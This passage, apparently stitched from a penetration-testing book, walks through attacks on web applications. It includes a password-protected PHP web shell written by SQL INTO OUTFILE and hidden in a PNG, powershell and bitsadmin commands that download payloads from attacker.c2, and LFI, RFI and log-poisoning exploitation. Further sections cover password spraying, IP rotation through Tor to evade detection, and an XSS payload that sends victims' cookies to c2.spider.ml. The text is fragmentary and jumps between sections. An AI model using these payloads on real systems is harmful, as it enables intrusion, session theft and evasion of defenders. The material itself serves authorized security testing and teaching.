have to report it to the client's blue team. It can also help the blue
team to identify files that may have been missed as part of the
incident response exercise. This is not always required, but it is
good practice, especially with high-risk artifacts.
This is good: the query was successful. We can check to see if the
PHP interpreter works in this directory, and if the file is successfully
executed, by calling it from the browser, as shown in the following
screenshot:
Figure 3.6: The PHP code executing successfully
If we pass data from the GET request into the PHP built-in system()
function, we can execute arbitrary commands on the server itself.
To easily write the shell code to the disk using MySQL's SELECT INTO
OUTFILE statement, we can compress it down to one line. Thankfully,
PHP is not very concerned with carriage returns, as long as the code
is properly segregated by semicolons and curly braces. We can
compress our web shell into the following line:
<?php if (md5($_GET['password']) == '4fe7aa8a3013d07e292e5218c3db4944') { system($_GET['cmd']); } ?>
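To drop this one-liner onto the server, a SELECT INTO OUTFILE along the following lines would write it as xampp.php in the same web root; the path is the same assumption as before:

SELECT "<?php if (md5($_GET['password']) == '4fe7aa8a3013d07e292e5218c3db4944') { system($_GET['cmd']); } ?>" INTO OUTFILE 'c:/xampp/htdocs/xampp/xampp.php';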
root@kali:/var/www/html# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
The hard part is over. Now we just have to get shell.php onto the
target server using the existing shell xampp.php. There are a couple
of ways to do this. On Linux servers, wget is almost always available
and simple to use. For Windows, you can leverage either the built-in
bitsadmin.exe or a sexier powershell.exe one-liner.
root@kali:/var/www/html# curl -G http://api.ecorp.local/xampp/xampp.php --data-urlencode "password=ECorpAppTest11251&cmd=powershell -w hidden -noni -nop -c (new-object net.webclient).DownloadFile('http://attacker.c2/test.php','c:\xampp\htdocs\xampp\test.php')"
root@kali:/var/www/html#
Curl has a --data-urlencode option, which will, you guessed it, URL
encode our command so that it passes through HTTP without
causing any problems. The -G switch ensures that the encoded data
is passed via a GET request.
root@kali:/var/www/html# curl -G http://api.ecorp.local/xampp/xampp.php --data-urlencode "password=ECorpAppTest11251&cmd=bitsadmin /transfer myjob /download /priority high http://attacker.c2/shell.php c:\\xampp\\htdocs\\xampp\\test.php"

BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Transfer complete.
root@kali:/var/www/html#
Note
As the bitsadmin output clearly states, the binary is deprecated.
While it is still available in all Windows versions to date, this may
not be the case going forward. However, enterprises are
somewhat slow to adopt new versions of Windows, so you can
probably rely on this tool for several years to come.
The Weevely client should now be able to connect to the test.php
shell on the remote host. The syntax to do this is self-explanatory:
root@kali:/var/www/html# weevely http://api.ecorp.local/xampp/test.php ECorpAppTest11251

[+] weevely 3.2.0
[+] Target: ECORP-PRD-API01:C:\xampp\htdocs\xampp
[+] Session: /root/.weevely/sessions/api.ecorp.local/test_0.session
[+] Shell: System shell
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely>
weevely> whoami
ECORP-PRD-API01\Administrator
ECORP-PRD-API01:C:\xampp\htdocs\xampp $
The first step after getting the Weevely shell would be to remove the
system passthrough web shell xampp.php artifact, created earlier as
follows:
ECORP-PRD-API01:C:\xampp\htdocs\xampp $ del
xampp.php
At this point, we are free to move around the server and gather any
information that could be used in later stages of an attack. We have
full control of the server, and can run even better reverse shells,
such as Meterpreter, if needed.
In the same way that we queried the MySQL variables to find out
where the application resides on disk, an attacker could use the
phpinfo() output to improve the success of a local file inclusion
attack, as follows:
ECORP-PRD-API01:C:\xampp\htdocs\xampp $ del
test.php phpinfo.php
ECORP-PRD-API01:C:\xampp\htdocs\xampp $ dir
[-][channel] The remote backdoor request triggers an error 404, please verify its availability
[-][channel] The remote backdoor request triggers an error 404, please verify its availability
ECORP-PRD-API01:C:\xampp\htdocs\xampp $
Note
It is a good idea to finalize the report before destroying any
persistence into the network.
Resources
Consult the following resources for more information on penetration
testing tools and techniques:
In our scenario, we did not tackle the application head on, spending
countless hours interacting with the API and looking for a way to
compromise it. Instead, we assumed that the bulk of the security-
hardening effort was spent on the application itself, and we banked
on the fact that, understandably, securing a server or development
environment, and keeping it secure, is a difficult task.
Password spraying
A common issue that comes up with brute-forcing for account
credentials is that the backend authentication system may simply
lock out the target account after too many invalid attempts are made
in a short period of time. Microsoft's Active Directory (AD) has
default policies set on all its users that do just that. The typical policy
is stringent enough that it would make attacking a single account
with a large password list very time-consuming for most attackers,
with little hope for a return on investment. Applications that integrate
authentication with AD will be subject to these policies and traditional
brute-force attacks may cause account lockouts, potentially firing
alerts on the defender side, and certainly raising some red flags with
the locked-out user.
/**
* slapit.js
*
* @requires jQuery, Slappy
*
* @updated klibby@corp on 12/12/2015
*/
(function(){
var obj = $('.target');
/* @todo dmurphy@corp: migrate to Slappy2
library */
var slap = new Slappy(obj, {
slide: false,
speed: 300
});
slap.swipe();
})();
The preceding code not only gives us at least two accounts to target
in our spray, but also hints at how user account names are
structured. If we look through the contact information on the Meet
the Executive Team page, we can make educated guesses as to
what these employees' account names could be.
FirstName.LastName
[First Initial]LastName
LastName[First Initial]
FirstNameLastName
Any contact emails listed on the public site we can add to our list of
potential users to target for a spraying attack. Chances are good that
these also correspond to their login credentials. If, for example, we
farm a ton of company emails in the [email protected]
format and we know nothing else, we could build a user list
containing the following entries:
david.lightman
dlightman
lightmand
davidl
davidlightman
dlightma
dlightm2
dlightm3
Modifiers and their parameters are separated by a colon (:). A modifier
can also be prefixed with a minus (-) sign to exclude matching results
from the search. The inurl modifier
can instruct Google to return only search results that contain a
particular string in the URL that was indexed. Conversely, the -inurl
modifier will exclude results that contain the specific string in their
URL. We can also wrap search terms in quotations to indicate that
we want results that match the exact string.
First, we will need to open the linkedin.txt file in read mode (r) and
store a pointer to it in the fp variable, as shown:
We can use a for loop to iterate the contents of fp using the iter
function. This will allow us to iterate over each line in the text file,
storing the respective value in the name variable for every loop:
Next, for each line, presumably containing a space delimited first and
last name entry, we can split() the two by a whitespace (' ') using
the following one-liner:
The variables first and last will contain the values you'd expect, in
lowercase and cleaned up of any extra spaces after chaining strip()
and lower() function calls.
Finally, we will also print a combination of the first initial and last
name, as well as less than the maximum eight-character versions of
each employee name:
fl = first[0] + last
lf = last + first[0]
print fl # dlightman
print lf # lightmand
All that's left to do is run the script and observe the output, as the
following figure shows:
Figure 4.2: Running the account name generator
Metadata
It's also possible to gather valid usernames by analyzing our list of
users, by looking at what is already available on the internet. Publicly
indexed documents are a good source for user IDs, as they often
contain valuable metadata information, either in the contents or
somewhere in the file header. When documents are created by
company employees, Microsoft Office and Adobe PDF, among many
other types of document-authoring software, by default will save the
name of the currently logged-on user as the file author in the
metadata. These documents don't have to be top secret; they can be
flyers and marketing material. It could be public data meant to be
shared with the world and we can make use of the automatically
populated metadata for our password spraying attacks.
With FOCA, we can quickly launch a search for all publicly available
documents for our target and one-click analyze their metadata.
Note
FOCA is available from ElevenPaths on
https://www.elevenpaths.com/labstools/foca/index.html or on
GitHub at https://github.com/ElevenPaths/FOCA.
When users forget their passwords, they call in tech support and
request a password reset. Usually, instead of an elaborate reset
procedure, support will reset the password to something simple to
read over the phone, so the employee can log in and resume working
quickly. A common password scheme is [Current Season][Current
Year]. Something like Fall2017 is easy to communicate over the
phone and will satisfy most password complexity policies. At times, a
special character may be sprinkled in there as well: Fall@2017 or
Fall2017!.
This isn't really an issue if the user logs in and resets their password
immediately. AD has an option for tech support that requires the user
to change their password after the first successful login.
Unfortunately, legacy systems and complex authentication schemes
do not always support password reset on first login, forcing
organizations to require users to do this manually. While the majority
of users will reset their password immediately, some won't and we
usually only need just one user to slip up.
Fall2017
Fall17
Fall2017!
Fall@2017
Summer2017
Summer17
Summer2017!
Summer@2017
Spring2017
Spring17
Spring2017!
Spring@2017
The request we will send will be a POST to the /login page. We can
specify the request body and payload positions under the Intruder
Positions tab. Highlighting the dummy values for username and
password, we can click the Add button on the right side to denote a
payload position, as shown in the following screenshot:
Figure 4.5: Defining the payload positions
Our second payload set will be the passwords to be tested for each
username. Once again, this is not where we'd load rockyou.txt and
let it rip. In a password spraying attack, we target a large list of
known-good user IDs, with only a few very common passwords. We
want to avoid locking out and triggering alerts.
After loading our target users list and specifying a few passwords,
we can spray the application by clicking Start attack. The following
figure shows the Intruder attack window and all of the requests made
during the password spraying attack:
Torify
The Tor Project was started to provide a way for users to browse
the internet anonymously. It is by far the best way to anonymize
traffic and best of all, it's free. Tor is a network of independently
operated nodes interconnected to form a network through which
packets can be routed.
The following graphic shows how a user, Alice, can connect to Bob
through a randomly generated path or circuit, through the Tor
network:
Figure 4.9: The Tor network traffic flow (source: https://www.torproject.org/)
Note
More information on Tor can be found on the official site:
https://www.torproject.org.
While Tor is important for anonymity, we're not really concerned with
staying completely anonymous. We can, however, leverage the
randomly chosen exit nodes to mask our public IP when attacking an
application.
Tor packages are available on most Linux distributions. On Kali, it
can be installed using the package manager. The apt-get command
shown in the following code will install Tor, as well as a useful
application called torsocks:
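A minimal sketch of that installation:

root@kali:~# apt-get install tor torsocks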
Torsocks is a nice tool that can "torify" applications and even provide
an interactive shell that automatically routes all traffic through an
active Tor tunnel. This will allow us to force applications that don't
natively support routing through Tor to use the anonymous network.
Note
Torsocks can be found on the Tor Project Git repository:
https://gitweb.torproject.org/torsocks.git.
root@kali:~# tor
[notice] Tor 0.3.1.9
[notice] Read configuration file "/etc/tor/torrc".
[notice] Opening Socks listener on 127.0.0.1:9050
[notice] Parsing GEOIP IPv4 file
/usr/share/tor/geoip.
[notice] Parsing GEOIP IPv6 file
/usr/share/tor/geoip6.
[warn] You are running Tor as root. You don't need
to, and you probably shouldn't.
[notice] Bootstrapped 0%: Starting
[notice] Starting with guard context "default"
[notice] Bootstrapped 80%: Connecting to the Tor
network
[notice] Bootstrapped 85%: Finishing handshake
with first hop
[notice] Bootstrapped 90%: Establishing a Tor
circuit
[notice] Tor has successfully opened a circuit.
Looks like client functionality is working.
[notice] Bootstrapped 100%: Done
Once the Tor client has initialized and a tunnel (circuit) has been
selected, a SOCKS proxy server is launched on the localhost,
listening on port 9050. To force our attack traffic through the Tor
network and mask our external IP, we can configure Burp Suite to
use the newly spawned proxy for all outgoing connections. Any other
programs that do not support SOCKS can be "torified" using either
ProxyChains or the previously installed torsocks utility.
Note
ProxyChains is available on all penetration testing distros and on
http://proxychains.sourceforge.net/.
In Burp Suite, under the Project options tab, we can select the
Override user options checkbox to enable the SOCKS configuration
fields. The values for SOCKS proxy and port will be localhost and
9050 respectively, and it's a good idea to make DNS lookups through
the proxy as well.
Figure 4.10: Configuring the upstream SOCKS proxy in Burp
While the Tor client does refresh the circuit periodically, it may not be
quick enough for a brute-force attack, where rotating IPs is needed
for evasion. We don't want to throttle our connection so much that
the scan does not finish before the engagement is over.
The Tor proxy can be forced to update the current circuit with a
process hang up signal (SIGHUP). Using the killall or kill Linux
commands, we can issue a HUP signal to the Tor application and
force the process to rotate our exit node.
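A one-off rotation looks like this:

root@kali:~# killall -HUP tor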
First, we can drop into a torsocks shell to hook all curl requests and
forward them through the Tor network. The torsocks command can
be called using the --shell parameter, as shown:
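Any public IP-echo service will do for checking the current exit node; ipinfo.io is used here purely as an example:
root@kali:~# torsocks --shell
root@kali:~# curl https://ipinfo.io/ip
root@kali:~# curl https://ipinfo.io/ip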
Each request to the IP service returned a new Tor exit node. We can
also crudely automate sending the HUP signal using the watch
command in a separate terminal. The -n option specifies how often
to execute the killall command. In this case, Tor will be issued a
SIGHUP every 10 seconds, effectively rotating our external IP at the
same time:
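root@kali:~# watch -n 10 killall -HUP tor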
The following figure shows the watch command running the killall
command on the Tor application every 10 seconds, while Burp's
Intruder module performs a password guessing attack:
Figure 4.12: Running a password guessing attack with a constantly changing exit IP
The low and slow nature of the attack, coupled with an ever-
changing source IP, makes it more difficult for defenders to
differentiate our attack traffic from legitimate traffic. It's not
impossible to design effective rules that find brute-force attacks
coming from many IPs in many regions, but it is fairly difficult to do
without generating false positives.
There are a couple of issues with conducting attacks through the Tor
network. The routing protocol is inherently slower than a more direct
connection. This is because Tor adds several layers of encryption to
each transmission, and each transmission is forwarded through
three Tor nodes on top of the normal routing that internet
communication requires. This process improves anonymity but also
increases communication delay significantly. The lag is noticeable for
normal web browsing, but this is a tolerable trade-off. For large
volume scans, it may not be the ideal transport.
Note
It should also be noted that Tor is used heavily in regions of the
world where privacy is of utmost importance. Conducting large
volume attacks through Tor is discouraged, as it can lead to
unnecessary network slowdowns and can impact legitimate
users. Low and slow attacks shouldn't cause any problems.
Some red-team engagements may even require testing from the
Tor network to verify related IDS/IPS rules are working as
intended, but caution should be taken when launching attacks
through a limited-resource public medium.
The other problem with Tor is that the exit nodes are public.
Firewalls, IDS, IPS, and even host-based controls can be configured
to outright block any connection from known Tor nodes. While there
are legitimate users on Tor, it also has a long history of being used
for illegal activity; the risk of annoying a small number of potential
customers by disallowing Tor connections is generally acceptable by
organizations.
Note
A list of active Tor exit nodes can be found here:
https://check.torproject.org/cgi-bin/TorBulkExitList.py.
Proxy cannon
An alternative to using Tor for diversifying our attack IPs is to simply
use the cloud. There are countless Infrastructure as a Service
(IaaS) providers, each with a large IP space available for free to VM
instances. VMs are cheap and sometimes free as well, so routing
our traffic through them should be fairly cost effective.
Cue ProxyCannon, a great tool that does all the heavy lifting of
talking to Amazon's AWS API, creating and destroying VM
instances, rotating external IPs, and routing our traffic through them.
Note
ProxyCannon was developed by Shellntel and is available on
GitHub:
https://github.com/Shellntel/scripts/blob/master/proxyCannon.py.
The ProxyCannon tool should now be ready to use with the -h option
showing all of the available options:
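root@kali:~# python proxyCannon.py -h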
The access key ID and the secret keys are randomly generated and
should be stored securely. Once the engagement is over, you should
delete the keys in the AWS console.
As you can see, these are stored in plaintext, so make sure this file
is properly protected. Amazon recommends that these keys are
rotated frequently. It's probably a good idea to create new ones for
each engagement and delete them from AWS as soon as they're not
required anymore.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Leave this terminal open and start another to run your commands.+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
On the AWS console, we can see the started t2.nano instances and
their public IPs:
RFI
LFI
File upload abuse
Chaining vulnerabilities to achieve code execution
If you have spent any amount of time working in the enterprise world,
you can no doubt attest to how frequent these issues can be.
Custom in-house applications are often built with deadlines in mind,
not security. Enterprise web applications are not the only problem:
the Internet of things (IoT) nightmare is just starting to take hold.
The majority of affordable devices, such as Wi-Fi routers or internet-
connected plush toys, are designed poorly and once released, are
never updated. Due to many constraints, both financial and in terms
of hardware limitations, device security is rudimentary, if at all
present. IoT devices are the new PHP applications of the 2000s and
vulnerabilities we thought were gone are coming back with a
vengeance.
Note
DVWA can be downloaded in various formats, including an easy
to run live CD, from http://www.dvwa.co.uk/.
RFI
Although not as common in modern applications, RFI vulnerabilities
do still pop up from time to time. RFI was popular back in the early
days of the web and PHP. PHP was notorious for allowing
developers to implement features that were inherently dangerous.
The include() and require() functions essentially allowed code to
be included from other files, either on the same disk or over the wire.
This makes web applications more powerful and dynamic but comes
at a great cost. As you can imagine, allowing user data to pass to
include() unsanitized can result in application or server
compromise.
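A vulnerable page can be as simple as the following sketch, which hands the user-supplied page parameter straight to include():
<?php
// Hypothetical example: whatever is passed in ?page= is included verbatim.
// With allow_url_include enabled, ?page=http://c2.spider.ml/test.txt pulls in
// and executes attacker-hosted PHP code.
include($_GET['page']);
?>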
http://dvwa.app.internal/vulnerabilities/fi/
http://dvwa.app.internal/vulnerabilities/fi/?
page=about.php
http://dvwa.app.internal/vulnerabilities/fi/?
page=http://c2.spider.ml/test.txt
Figure 5.1: The application includes the remotely hosted PHP code, executes it, and returns
the contents of /etc/passwd
The DVWA can be used to showcase this type of attack. The high
difficulty setting disallows the uploading of anything but JPEG or
PNG files, so we can't just access the uploaded shell directly and
execute the code.
To get around this issue, we can generate a fake PNG file using
ImageMagick's convert command. We will create a small 32×32
pixel image, with a pink background, and save it as shell.png using
the following switches:
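root@kali:~# convert -size 32x32 xc:pink shell.png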
The file data structure is relatively simple. The PNG header and a
few bytes describing the content are automatically generated by the
convert command. We can inspect these bytes using the hexdump
command. The -C parameter will make the output a bit more
readable:
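root@kali:~# hexdump -C shell.png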
Just as before, the if statement will check that the MD5 hash value
of the incoming password parameter matches
f1aab5cd9690adfa2dde9796b4c5d00d. If there's a match, the command
string in the cmd GET parameter will be passed to the PHP system()
function, which will execute it as a system command, giving us shell
access.
The MD5 value we're looking for is the hash of DVWAAppLFI1, as
confirmed by the md5sum Linux command:
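root@kali:~# echo -n "DVWAAppLFI1" | md5sum
f1aab5cd9690adfa2dde9796b4c5d00d  -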
We can use the echo shell command to append (>>) the PHP code to
our shell.png image:
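root@kali:~# echo '<?php if (md5($_GET["password"]) == "f1aab5cd9690adfa2dde9796b4c5d00d") { system($_GET["cmd"]); } ?>' >> shell.png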
We've seen this passthrough shell before and it should do the trick
for now. We can replace it with a more advanced shell if needed, but
for our proof of concept, this should suffice.
For all intents and purposes, this is still a valid PNG image. Most
rendering software should have no problem displaying the contents,
a small pink box, as shown:
Figure 5.4: The backdoored PNG file successfully uploaded to the target application
DVWA is nice enough to tell us where the application stored our file.
In real-world scenarios, we may not be so lucky. We'd have to rely
on information leaks for the absolute path if the vulnerability required
it. If we can use relative paths in the file inclusion attack, we can try
and find the file on disk by systematically moving through the
filesystem (../, ../../, ../../../ and so on).
To make use of our PNG shell, we will use the DVWA file inclusion
vulnerability at http://dvwa.app.internal/vulnerabilities/fi/. The
LFI issue is present in the page parameter via a GET request. The
application allows inclusion of a few files on disk, presumably to be
more modular and easier to manage.
The if statement will only allow files to be included if they begin with
the word file, such as file01.php, or file02.php. The include.php
file is also allowed to be included. Anything else, such as
http://c2.spider.ml/test.txt, for example, will produce an ERROR:
File not found! message.
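The control boils down to a string match along these lines (an approximation of the DVWA source, not a verbatim copy):
<?php
$file = $_GET['page'];

// Only allow pages whose name starts with "file", or the include.php helper
if (!fnmatch("file*", $file) && $file != "include.php") {
    echo "ERROR: File not found!";
    exit;
}
?>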
At first glance, this is a fairly stringent control, but there are some
issues. This particular control implementation illustrates an important
issue with application development and security. In an effort to
prevent inclusion attacks, the developers went with the whitelist
approach, but due to time constraints and high maintenance costs,
they decided to use string matching instead of an explicit list of files.
Ideally, user input should never be passed to the include (or similar)
function at all. Hard-coding values is more secure, but the code is
harder to manage. There is always a tradeoff between security and
usability, and as attackers, we bank on management going with the
more cost effective and typically more insecure option.
We could name our PNG shell file.png, but since our uploaded file
will reside outside of the vulnerable script's directory, the string we'd
have to pass in would need to be an absolute (or relative) path,
which would fail to trigger the if condition shown in the preceding
screenshot and the exploit would fail. Once again, PHP's versatility
and developer-friendliness comes to the rescue. PHP allows
developers to reference files on disk by relative path
(../../../etc/passwd), by absolute path (/etc/passwd), or using the
built-in URL scheme file://.
http://dvwa.app.internal/vulnerabilities/fi/?page=file:///var/www/html/hackable/uploads/shell.png
The Burp Repeater module can help us to trigger and inspect the
results of exploiting this vulnerability, as shown in the following
figure:
Figure 5.6: Successfully including the backdoored PNG using LFI
This looks good. In the left column is a raw HTTP GET request to the
vulnerable page using the file:// scheme and the absolute path to
our shell.png for the page parameter. In the right column, the server
response appears to indicate that the file was included and the PHP
source code we appended to it is not displayed, meaning it either
executed or it was stripped out by a compression or cropping
function. The latter would be unfortunate, but we can quickly see
whether code execution is successful by trying to trigger the shell
through the URL.
The uploaded shell will execute command strings passed via the GET
parameter cmd and we can append the whoami operating system
command to our previous payload, and observe the Burp Repeater
module's output. We must also provide the expected password via
the password parameter, as shown in the following figure:
Figure 5.7: The backdoored PNG successfully executes the shell command after LFI
Success! We now have code execution on the system by taking
advantage of two vulnerabilities: poor controls in file upload and LFI.
The Repeater Request column highlights the command whoami,
being passed to the vulnerable application and the server response
confirms that we have achieved our goal of displaying the user www-
data as the context of the application.
Not unlike the file:// payload looking for the uploaded shell, we
can reference another file on the system whose contents we control
to an extent. Apache web servers, by default, generate an
access.log file somewhere on the disk. This file contains every
request sent to the application, including the URL. Experience, along
with some Google-fu, tells us that this file is usually found in
/var/log/apache2 or /var/log/httpd.
We can pass in our shell using a simple HTTP GET request to the
application:
Figure 5.8: Sending our PHP shell code to the application server log through a GET request
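The shell code has to land in the log unmangled, so the request is best sent through Burp Repeater or netcat, where the PHP is not URL-encoded. The request will return a 404, but the request line still ends up in access.log. A sketch of such a request:
GET /<?php if (md5($_GET['password']) == 'f1aab5cd9690adfa2dde9796b4c5d00d') { system($_GET['cmd']); } ?> HTTP/1.1
Host: dvwa.app.internal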
All that's left to do is use LFI and have PHP execute whatever code
is in the log file. As before, we have to provide the correct password
via the GET request. Our URL payload will contain the file://
scheme and the absolute path to the Apache access.log file,
/var/log/apache2/access.log, our shell password, and the command
to view the contents of the /etc/passwd file. Since this command is
sent via a GET request parameter, we have to encode the space
between cat and /etc/passwd as a plus sign, as shown:
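Put together, the request URL is:
http://dvwa.app.internal/vulnerabilities/fi/?page=file:///var/log/apache2/access.log&password=DVWAAppLFI1&cmd=cat+/etc/passwd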
Figure 5.9: Remote code execution via LFI and poisoned Apache log files
The server response confirms that the shell command cat was
executed successfully. Somewhere inside all of the response noise,
we can find the contents of /etc/passwd. There are some obvious
stealth issues with this approach. If log files are scrutinized by the
defenders, this would stand out like a sore thumb.
This method may be crude, but it does showcase the extent of the
damage a simple file inclusion vulnerability can cause.
File inclusion to remote code
execution
Similar to the file:// scheme used in the earlier example, the PHP
interpreter also provides access to various input and output streams
via the php:// scheme. This makes sense for when PHP is used in a
command-line interface (CLI) and the developer needs to access
these common operating system standard streams: stdin, stderr,
stdout, and even the memory. Standard streams are used by
applications to communicate with the environment they are
executing in. For example, the Linux passwd command will use the stdout
stream to display informational messages to the terminal ("Enter
your existing password"), stderr to display error messages ("Invalid
password"), and stdin to prompt for user input to change the existing
password.
Note
A superglobal is a variable that is always set by the PHP
interpreter and is accessible throughout the application. $_GET
and $_POST are the most popular, but there are others, including
$_SESSION, $_ENV, and $_SERVER. More information can be found in
the PHP manual:
http://php.net/manual/en/language.variables.superglobals.php.
The GET request shown in the preceding screenshot, in the left pane,
uses the php://input as the page parameter, instructing PHP to
include code coming in from user input. In a web application setting,
input data comes from the body of the request. In this case, the body
contains a simple PHP script that executes the command cat
/etc/passwd on the system. The response reflects the output of
/etc/passwd, confirming that remote code execution was successful.
There are other problems with allowing users to upload arbitrary files
to the application. You could very well prevent users from uploading
PHP, JSP, or ASP shells by simply blacklisting the extension. PHP
only executes code in files with a particular extension (or two) if they
are called directly. Barring any LFI vulnerability somewhere else in
the application, the file upload feature should be fairly safe from a
code execution perspective.
package
{
    import flash.display.Sprite;
    import flash.external.*;
    import flash.system.System;

    public class XSSProject extends Sprite
    {
        public function XSSProject()
        {
            flash.system.Security.allowDomain("*");
            ExternalInterface.marshallExceptions = true;
            try {
                ExternalInterface.call("0);}catch(e){};" + root.loaderInfo.parameters.js + "//");
            } catch(e:Error) {
                trace(e);
            }
        }
    }
}
Let's go ahead and upload the XSSProject SWF malicious file using
the application's file upload feature. You may need to change the
DVWA difficulty to low, to allow non-image file upload. The following
figure shows that the XSSProject malware was uploaded
successfully in the familiar directory:
http://dvwa.app.internal/hackable/uploads/xssproject.swf?js=[javascript code]
To test the POC, we can call the following URL and observe the
browser behavior:
http://dvwa.app.internal/hackable/uploads/xssproject.swf?js=alert(document.cookie);
We can use this URL to perform XSS attacks against users of the
vulnerable application. Instead of popping up a window to prove the
vulnerability exists, we could inject more useful JavaScript code,
such as a Browser Exploitation Framework (BeEF) hook. We will
discuss this tool in Chapter 9, Practical Client-Side Attacks.
The following figure shows that the JavaScript code was injected
successfully by the malware (xssproject.swf):
Figure 5.12: XSS attack after abusing file upload functionality
This payload will write new HTML code to the Document Object
Model (DOM) using the document object. The HTML code is a hidden
iframe element, which makes an HTTP request to our command and
control infrastructure. The HTTP request will contain the victim's
cookies, Base64-encoded right in the request URL, allowing us to
capture this data remotely. The last function to redirect the client to
the main page '/' will trigger after 500 milliseconds. This is to
ensure the iframe has a chance to load and exfiltrate our data.
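Decoded, the JavaScript payload reads:
document.write("Loading...<iframe style='display:none;' src='//c2.spider.ml/"+btoa(document.cookie)+"'></iframe>");
setTimeout(function(){window.location.href='/';},500);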
Figure 5.13: URL encoding the JavaScript payload using Burp's Decoder module
http://dvwa.app.internal/hackable/uploads/xssproje
ct.swf?
js=%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%2
2%4c%6f%61%64%69%6e%67%2e%2e%2e%3c%69%66%72%61%6d%
65%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a
%6e%6f%6e%65%3b%27%20%73%72%63%3d%27%2f%2f%63%32%2
e%73%70%69%64%65%72%2e%6d%6c%2f%22%2b%62%74%6f%61%
28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29
%2b%22%27%3e%3c%2f%69%66%72%61%6d%65%3e%22%29%3b%7
3%65%74%54%69%6d%65%6f%75%74%28%66%75%6e%63%74%69%
6f%6e%28%29%7b%77%69%6e%64%6f%77%2e%6c%6f%63%61%74
%69%6f%6e%2e%68%72%65%66%3d%27%2f%27%3b%7d%2c%35%3
0%30%29%3b
root@spider-c2-1:~# nc -lvp 80
listening on [any] 80 ...
connect to [10.0.0.4] from 11.25.198.51 59197
With the server ready for incoming connections from our victim, we
can start our attack and wait for the user to click on our malicious
URL:
GET
/UEhQU0VTU0lEPXBhdGxrbms4bm5ndGgzcmFpNjJrYXYyc283O
yBzZWN1cml0eT1oaWdo
HTTP/1.1
Host: c2.spider.ml
Connection: keep-alive
Upgrade-Insecure-Requests: 1
[...]
root@spider-c2-1:~# echo
"UEhQU0VTU0lEPXBhdGxrbms4bm5ndGgzcmFpNjJrYXYyc283O
yBzZWN1cml0eT1oaWdo" | base64 -d
PHPSESSID=patlknk8nngth3rai62kav2so7; security=high
Creating a C2 server
Using INetSim to emulate services
Confirming vulnerabilities using out-of-band techniques
Advanced data exfiltration
A common scenario
Imagine that the application http://vuln.app.internal/user.aspx?
name=Dade is vulnerable to a SQL injection attack on the name
parameter. Traditional payloads and polyglots do not seem to affect
the application's response. Perhaps database error messages are
disabled and the name value is not processed synchronously by the
application.
A simple single-quote value for name would produce a SQL error and
we'd be in business, but in this case, the error messages are
suppressed, so from a client perspective, we'd have no idea
something went wrong. Taking it a step further, we can force the
application to delay the response by a significant amount of time
to confirm the vulnerability:
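For a Microsoft SQL Server backend, the payload can be as simple as:
';WAITFOR DELAY '0:0:20';--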
This payload injects a 20-second delay into the query execution.
Normally, that delay would be an obvious tell, but here the query is
executed asynchronously: the application responds to us before the
query has completed, because the response probably doesn't depend
on the result.
';declare @q varchar(99);set @q='\\attacker.c2\test'; exec master.dbo.xp_dirtree @q;--
Google Cloud
Amazon AWS
Microsoft Azure
DigitalOcean
Google Cloud and Amazon AWS have tiers that provide you with all
the VM resources you need for free; for a limited time, of course.
However, the few dollars a month it costs to run VMs in the cloud is
well worth it for those of us who rely on C2 infrastructure.
Note
These C2 instances should also be a per-client deployment and
the disks should be encrypted. Due to the nature of our work,
sensitive customer data may flow in and could be stored
insecurely. Once an engagement is complete, destroy the
instance, along with any client data it may have collected.
Figure 6.2: The zone configuration and the delegation of c2.spider.ml to our C2 instance's
IP
Note
Let’s Encrypt provides free domain-validated certificates for
hostnames and even wildcard certificates. More information can
be found on https://letsencrypt.org/.
root@spider-c2-1:~# wget
https://dl.eff.org/certbot-auto
[...]
root@spider-c2-1:~# chmod +x certbot-auto
Certbot does have the option to automatically update web server
configuration but for our purposes, we will do a manual request. This
will drop the new certificate somewhere on disk and we can use it as
we please.
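The exact invocation depends on the Certbot version; a manual DNS-challenge request for a wildcard covering the C2 zone looks roughly like this:
root@spider-c2-1:~# ./certbot-auto certonly --manual --preferred-challenges dns -d "*.c2.spider.ml"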
dGhlIG9ubHkgd2lubmluZyBtb3ZlIGlzIG5vdCB0byBwbGF5
Before continuing, verify the record is deployed.
-------------------------------------------------------------------
Press Enter to Continue
The wizard may prompt you again to update the TXT value to
something new, in which case you may have to wait a few minutes
before continuing. A low TTL value such as 5 minutes or less will
help with the wait.
If everything is in order and Let’s Encrypt was able to verify the TXT
records, a new certificate will be issued and stored on disk
somewhere in /etc/letsencrypt/live/:
IMPORTANT NOTES:
- Congratulations! Your certificate and chain
have been saved at:
/etc/letsencrypt/live/spider.ml/fullchain.pem
Your key file has been saved at:
/etc/letsencrypt/live/spider.ml/privkey.pem
[...]
root@spider-c2-1:~#
These certificates are only valid for a few months at a time, as per
Let’s Encrypt policy. You will have to renew these using a similar
process as the initial request. Certbot keeps a record of requested
certificates and their expiry dates. Issuing a renew command will
iterate through our certificates and automatically renew them.
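root@spider-c2-1:~# ./certbot-auto renew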
INetSim looks for these files in the certs directory, which is
typically located under /usr/share/inetsim/data/.
We can now enable the simulated HTTPS service and test the
certificate validity:
Note
INetSim binaries, source, and documentation are available on
http://www.inetsim.org/.
root@spider-c2-1:~# wget -O -
https://www.inetsim.org/inetsim-archive-signing-
key.asc | apt-key add -
[...]
(464 MB/s) - written to stdout [2722/2722]
OK
root@spider-c2-1:~#
The next step is to grab the inetsim package from the newly
installed apt repository and install it.
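root@spider-c2-1:~# apt-get update && apt-get install inetsim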
The INetSim default configuration may be a bit too much for our
purposes. Services such as FTP, which allow arbitrary credentials
and provide upload support, should not be enabled on the internet.
Note
INetSim is a great tool, but use with care. If the C2 server you
are building is intended for a long-term engagement, it is better to
use a proper daemon for each service you are intercepting.
The following echo command will replace the contents of the sample
HTTP files with benign JavaScript code:
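The sample file name and location can vary between versions; with the data directory noted earlier, the command is roughly:
root@spider-c2-1:~# echo 'console.log("ok");' > /usr/share/inetsim/data/http/fakefiles/sample.html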
This is the path our DNS query takes through the internet: from the querying host's recursive resolver, through the root and TLD name servers, and finally down to the INetSim instance we delegated as authoritative for the c2.spider.ml zone.
